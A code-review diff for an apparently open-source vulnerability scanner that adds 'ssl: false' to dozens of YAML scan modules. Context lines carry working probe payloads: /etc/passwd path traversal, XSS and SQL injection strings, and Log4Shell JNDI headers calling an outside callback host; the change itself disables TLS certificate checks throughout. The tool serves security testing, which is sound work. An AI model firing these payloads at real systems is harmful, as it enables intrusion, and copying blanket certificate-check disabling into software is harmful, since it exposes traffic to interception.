### PR TITLE
turn off ssl verification in http modules

### DIFF
--- a/modules/scan/admin.yaml
+++ b/modules/scan/admin.yaml
@@ -18,6 +18,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{urls}}"

--- a/modules/scan/drupal_modules.yaml
+++ b/modules/scan/drupal_modules.yaml
@@ -19,6 +19,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/scan/drupal_theme.yaml
+++ b/modules/scan/drupal_theme.yaml
@@ -19,6 +19,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/index.php"

--- a/modules/scan/drupal_version.yaml
+++ b/modules/scan/drupal_version.yaml
@@ -19,6 +19,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/CHANGELOG.txt"

--- a/modules/scan/joomla_template.yaml
+++ b/modules/scan/joomla_template.yaml
@@ -19,6 +19,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"

--- a/modules/scan/joomla_user_enum.yaml
+++ b/modules/scan/joomla_user_enum.yaml
@@ -19,6 +19,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/?format=feed"

--- a/modules/scan/joomla_version.yaml
+++ b/modules/scan/joomla_version.yaml
@@ -19,6 +19,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"

--- a/modules/scan/pma.yaml
+++ b/modules/scan/pma.yaml
@@ -18,6 +18,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{urls}}"

--- a/modules/scan/subdomain.yaml
+++ b/modules/scan/subdomain.yaml
@@ -18,6 +18,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url: "https://jldc.me/anubis/subdomains/{target}"
         response:
           condition_type: and
@@ -32,6 +33,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url: "https://api.certspotter.com/v1/issuances?domain={target}&expand=dns_names&expand=issuer"
         response:
           condition_type: and
@@ -46,6 +48,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url: "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain={target}"
         response:
           condition_type: and
@@ -61,6 +64,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url: "https://urlscan.io/api/v1/search/?q=domain:{target}"
         response:
           condition_type: and
@@ -76,6 +80,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url: "https://dns.bufferover.run/dns?q={target}"
         response:
           condition_type: and
@@ -91,6 +96,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url: "https://otx.alienvault.com/api/v1/indicator/domain/{target}/passive_dns"
         response:
           condition_type: and
@@ -106,6 +112,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url: "https://api.threatminer.org/v2/domain.php?q={target}&api=True&rt=5"
         response:
           condition_type: and
@@ -121,6 +128,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url: "https://crt.sh/?q=%.{target}"
         response:
           condition_type: and
@@ -135,6 +143,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url: "https://hackertarget.com/find-dns-host-records/"
         data:
           theinput: "{target}"
@@ -155,6 +164,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url: "https://dnsdumpster.com/"
         response:
           save_to_temp_events_only: "dnsdumpster_csrf_token"
@@ -177,6 +187,7 @@ payloads:
           User-Agent: "{user_agent}"
           Referer: "https://dnsdumpster.com/"
           Cookie: "dependent_on_temp_event[0]['headers']['Set-Cookie'][1]"
+        ssl: false
         url: "https://dnsdumpster.com/"
         data:
           csrfmiddlewaretoken: "dependent_on_temp_event[0]['content'][0]"
@@ -197,6 +208,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url: "https://toolbox.googleapps.com/apps/dig/#ANY/"
         response:
           save_to_temp_events_only: "googledig_csrf_token"
@@ -227,6 +239,7 @@ payloads:
           sec-fetch-mode: "cors"
           sec-fetch-dest: "empty"
           accept-language: "en-US,en;q=0.9,fa-IR;q=0.8,fa;q=0.7"
+        ssl: false
         url: "https://toolbox.googleapps.com/apps/dig/lookup"
         data:
           csrfmiddlewaretoken: "dependent_on_temp_event[0]['content'][0]"

--- a/modules/scan/viewdns_reverse_iplookup.yaml
+++ b/modules/scan/viewdns_reverse_iplookup.yaml
@@ -18,6 +18,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url:
           - https://viewdns.info/reverseip/?host={target}&t=1
         response:

--- a/modules/scan/waf.yaml
+++ b/modules/scan/waf.yaml
@@ -19,6 +19,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: true
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"
@@ -46,6 +47,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: true
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/?{{query}}={{param}}"

--- a/modules/scan/web_technologies.yaml
+++ b/modules/scan/web_technologies.yaml
@@ -21,6 +21,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/scan/wordpress_version.yaml
+++ b/modules/scan/wordpress_version.yaml
@@ -20,6 +20,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/wp-admin/install.php"

--- a/modules/scan/wp_plugin.yaml
+++ b/modules/scan/wp_plugin.yaml
@@ -20,6 +20,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/wp-content/plugins/{{paths}}/readme.txt"

--- a/modules/scan/wp_theme.yaml
+++ b/modules/scan/wp_theme.yaml
@@ -21,6 +21,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/wp-content/themes/{{paths}}"

--- a/modules/scan/wp_timethumbs.yaml
+++ b/modules/scan/wp_timethumbs.yaml
@@ -21,6 +21,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"

--- a/modules/vuln/accela_cve_2021_34370.yaml
+++ b/modules/vuln/accela_cve_2021_34370.yaml
@@ -23,6 +23,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/"

--- a/modules/vuln/apache_cve_2021_41773.yaml
+++ b/modules/vuln/apache_cve_2021_41773.yaml
@@ -24,6 +24,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{path}}"

--- a/modules/vuln/apache_cve_2021_42013.yaml
+++ b/modules/vuln/apache_cve_2021_42013.yaml
@@ -25,6 +25,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
           Host: '{target}'
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"

--- a/modules/vuln/apache_struts.yaml
+++ b/modules/vuln/apache_struts.yaml
@@ -31,6 +31,7 @@ payloads:
                   - randomstring_xyz_3
           Accept: "*/*"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/vuln/aviatrix_cve_2021_40870.yaml
+++ b/modules/vuln/aviatrix_cve_2021_40870.yaml
@@ -26,6 +26,7 @@ payloads:
           Host: "{target}"
           Content-Type: application/x-www-form-urlencoded
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/v1/backend1"
@@ -55,6 +56,7 @@ payloads:
           Host: "{target}"
           Content-Type: application/x-www-form-urlencoded
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/v1/random_string1.php"

--- a/modules/vuln/cisco_hyperflex_cve_2021_1497.yaml
+++ b/modules/vuln/cisco_hyperflex_cve_2021_1497.yaml
@@ -25,6 +25,7 @@ payloads:
           Content-Type: application/x-www-form-urlencoded
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"

--- a/modules/vuln/citrix_cve_2019_19781.yaml
+++ b/modules/vuln/citrix_cve_2019_19781.yaml
@@ -21,6 +21,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"

--- a/modules/vuln/clickjacking.yaml
+++ b/modules/vuln/clickjacking.yaml
@@ -18,6 +18,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/vuln/cloudron_cve_2021_40868.yaml
+++ b/modules/vuln/cloudron_cve_2021_40868.yaml
@@ -24,6 +24,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

--- a/modules/vuln/content_security_policy.yaml
+++ b/modules/vuln/content_security_policy.yaml
@@ -19,6 +19,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}"

--- a/modules/vuln/content_type_options.yaml
+++ b/modules/vuln/content_type_options.yaml
@@ -18,6 +18,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/vuln/cyberoam_netgenie_cve_2021_38702.yaml
+++ b/modules/vuln/cyberoam_netgenie_cve_2021_38702.yaml
@@ -25,6 +25,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

--- a/modules/vuln/exponent_cms_cve_2021_38751.yaml
+++ b/modules/vuln/exponent_cms_cve_2021_38751.yaml
@@ -24,6 +24,7 @@ payloads:
           User-Agent: "{user_agent}"
           Host: "random_string_1.com"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/vuln/f5_cve_2020_5902.yaml
+++ b/modules/vuln/f5_cve_2020_5902.yaml
@@ -20,6 +20,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"

--- a/modules/vuln/forgerock_am_cve_2021_35464.yaml
+++ b/modules/vuln/forgerock_am_cve_2021_35464.yaml
@@ -23,6 +23,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/openam/oauth2/..;/ccversion/Version"

--- a/modules/vuln/galera_webtemp_cve_2021_40960.yaml
+++ b/modules/vuln/galera_webtemp_cve_2021_40960.yaml
@@ -24,6 +24,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

--- a/modules/vuln/grafana_cve_2021_43798.yaml
+++ b/modules/vuln/grafana_cve_2021_43798.yaml
@@ -22,6 +22,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd"

--- a/modules/vuln/graphql.yaml
+++ b/modules/vuln/graphql.yaml
@@ -19,6 +19,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{endpoint}}"

--- a/modules/vuln/gurock_testrail_cve_2021_40875.yaml
+++ b/modules/vuln/gurock_testrail_cve_2021_40875.yaml
@@ -24,6 +24,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"

--- a/modules/vuln/hoteldruid_cve_2021-37833.yaml
+++ b/modules/vuln/hoteldruid_cve_2021-37833.yaml
@@ -24,6 +24,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"

--- a/modules/vuln/http_cookie.yaml
+++ b/modules/vuln/http_cookie.yaml
@@ -20,6 +20,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/vuln/http_cors.yaml
+++ b/modules/vuln/http_cors.yaml
@@ -28,6 +28,7 @@ payloads:
                   - "http"
                   - "https"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"
@@ -64,6 +65,7 @@ payloads:
                   - "http"
                   - "https"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"
@@ -101,6 +103,7 @@ payloads:
                   - "http"
                   - "https"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"
@@ -137,6 +140,7 @@ payloads:
                   - "http"
                   - "https"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"
@@ -173,6 +177,7 @@ payloads:
                   - "http"
                   - "https"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"
@@ -209,6 +214,7 @@ payloads:
                   - "http"
                   - "https"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"
@@ -236,6 +242,7 @@ payloads:
           User-Agent: "{user_agent}" #http://owasp.org
           Origin: "http://{target}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"
@@ -272,6 +279,7 @@ payloads:
                   - "http"
                   - "https"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"
@@ -308,6 +316,7 @@ payloads:
                   - "http"
                   - "https"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/vuln/http_options_enabled.yaml
+++ b/modules/vuln/http_options_enabled.yaml
@@ -18,6 +18,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/vuln/justwirting_cve_2021_41878.yaml
+++ b/modules/vuln/justwirting_cve_2021_41878.yaml
@@ -24,6 +24,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

--- a/modules/vuln/log4j_cve_2021_44228.yaml
+++ b/modules/vuln/log4j_cve_2021_44228.yaml
@@ -22,7 +22,8 @@ payloads:
       - method: get
         timeout: 3
         headers:
-           User-Agent: "{user_agent}"
+          User-Agent: "{user_agent}"
+        ssl: false
         url: "https://log4shell.huntress.com/"
         response:
           save_to_temp_events_only: log4shell_token
@@ -93,6 +94,7 @@ payloads:
           - X-Request-ID: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - Save-Data: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - X-Api-Version: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{path}}"
@@ -178,7 +180,7 @@ payloads:
           - X-Request-ID: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - Save-Data: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - X-Api-Version: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
-
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{path}}"
@@ -264,7 +266,7 @@ payloads:
           - X-Request-ID: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - Save-Data: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - X-Api-Version: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
-
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{path}}"
@@ -350,6 +352,7 @@ payloads:
           - X-Request-ID: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - Save-Data: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - X-Api-Version: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{path}}"
@@ -438,7 +441,7 @@ payloads:
           - X-Request-ID: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - Save-Data: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - X-Api-Version: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
-
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{path}}"
@@ -524,7 +527,7 @@ payloads:
           - X-Request-ID: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - Save-Data: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - X-Api-Version: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
-
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{path}}"
@@ -610,7 +613,7 @@ payloads:
           - X-Request-ID: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - Save-Data: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
           - X-Api-Version: "${{jndi:ldap://log4shell.huntress.com:1389/dependent_on_temp_event[0]['content'][0]}}"
-
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{path}}"
@@ -643,6 +646,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "https://log4shell.huntress.com/json/{{token}}"

--- a/modules/vuln/maxsite_cms_cve_2021_35265.yaml
+++ b/modules/vuln/maxsite_cms_cve_2021_35265.yaml
@@ -24,6 +24,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"

--- a/modules/vuln/msexchange_cve_2021_26855.yaml
+++ b/modules/vuln/msexchange_cve_2021_26855.yaml
@@ -24,6 +24,7 @@ payloads:
           Cookie:
             - "X-AnonResource=true; X-AnonResource-Backend=http://{target}/ecp/default.flt?~3;"
             - "X-AnonResource=true; X-AnonResource-Backend=https://{target}/ecp/default.flt?~3;"
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/owa/auth/x.js"

--- a/modules/vuln/msexchange_cve_2021_34473.yaml
+++ b/modules/vuln/msexchange_cve_2021_34473.yaml
@@ -24,6 +24,7 @@ payloads:
         allow_redirects: false
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"

--- a/modules/vuln/novnc_cve_2021_3654.yaml
+++ b/modules/vuln/novnc_cve_2021_3654.yaml
@@ -23,6 +23,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}//example.com/%2f.."

--- a/modules/vuln/omigod_cve_2021_38647.yaml
+++ b/modules/vuln/omigod_cve_2021_38647.yaml
@@ -26,6 +26,7 @@ payloads:
           User-Agent: "{user_agent}"
           Host: {target}
           Content-Type: application/soap+xml;charset=UTF-8
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/wsman"

--- a/modules/vuln/payara_cve_2021_41381.yaml
+++ b/modules/vuln/payara_cve_2021_41381.yaml
@@ -24,6 +24,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"

--- a/modules/vuln/phpinfo_cve_2021_37704.yaml
+++ b/modules/vuln/phpinfo_cve_2021_37704.yaml
@@ -24,6 +24,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"

--- a/modules/vuln/placeos_cve_2021_41826.yaml
+++ b/modules/vuln/placeos_cve_2021_41826.yaml
@@ -23,6 +23,7 @@ payloads:
         timeout: 3
         headers:
           User-Agent: "{user_agent}"
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/auth/logout?continue=//example.com"

--- a/modules/vuln/prestashop_cve_2021_37538.yaml
+++ b/modules/vuln/prestashop_cve_2021_37538.yaml
@@ -24,6 +24,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"

--- a/modules/vuln/puneethreddyhc_sqli_cve_2021_41648.yaml
+++ b/modules/vuln/puneethreddyhc_sqli_cve_2021_41648.yaml
@@ -23,6 +23,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/action.php"

--- a/modules/vuln/puneethreddyhc_sqli_cve_2021_41649.yaml
+++ b/modules/vuln/puneethreddyhc_sqli_cve_2021_41649.yaml
@@ -23,6 +23,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/homeaction.php"

--- a/modules/vuln/qsan_storage_xss_cve_2021_37216.yaml
+++ b/modules/vuln/qsan_storage_xss_cve_2021_37216.yaml
@@ -24,6 +24,7 @@ payloads:
           User-Agent: "{user_agent}"
           X-Trigger-XSS: "<script>alert(1)</script>"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/http_header.php"

--- a/modules/vuln/server_version.yaml
+++ b/modules/vuln/server_version.yaml
@@ -18,6 +18,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/vuln/strict_transport_security.yaml
+++ b/modules/vuln/strict_transport_security.yaml
@@ -20,6 +20,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/"

--- a/modules/vuln/subdomain_takeover.yaml
+++ b/modules/vuln/subdomain_takeover.yaml
@@ -19,6 +19,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}"

--- a/modules/vuln/tieline_cve_2021_35336.yaml
+++ b/modules/vuln/tieline_cve_2021_35336.yaml
@@ -36,6 +36,7 @@ payloads:
                   - 80
                   - 443
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/api/get_device_details"

--- a/modules/vuln/tjws_cve_2021_37573.yaml
+++ b/modules/vuln/tjws_cve_2021_37573.yaml
@@ -23,6 +23,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/te%3Cimg%20src=x%20onerror=alert(1)%3Est"

--- a/modules/vuln/vbulletin_cve_2019_16759.yaml
+++ b/modules/vuln/vbulletin_cve_2019_16759.yaml
@@ -20,6 +20,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/ajax/render/widget_tabbedcontainer_tab_panel"

--- a/modules/vuln/wp_plugin_cve_2021_38314.yaml
+++ b/modules/vuln/wp_plugin_cve_2021_38314.yaml
@@ -26,6 +26,7 @@ payloads:
           User-Agent: "{user_agent}"
           Accept: "*/*"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/wp-admin/admin-ajax.php?action=NETTACKER_MD5_GENERATOR_START{{md5}}NETTACKER_MD5_GENERATOR_STOP"

--- a/modules/vuln/wp_plugin_cve_2021_39316.yaml
+++ b/modules/vuln/wp_plugin_cve_2021_39316.yaml
@@ -25,6 +25,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
           nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"

--- a/modules/vuln/wp_plugin_cve_2021_39320.yaml
+++ b/modules/vuln/wp_plugin_cve_2021_39320.yaml
@@ -25,6 +25,7 @@ payloads:
         headers:
           User-Agent: "{user_agent}"
         allow_redirects: false
+        ssl: false
         url:
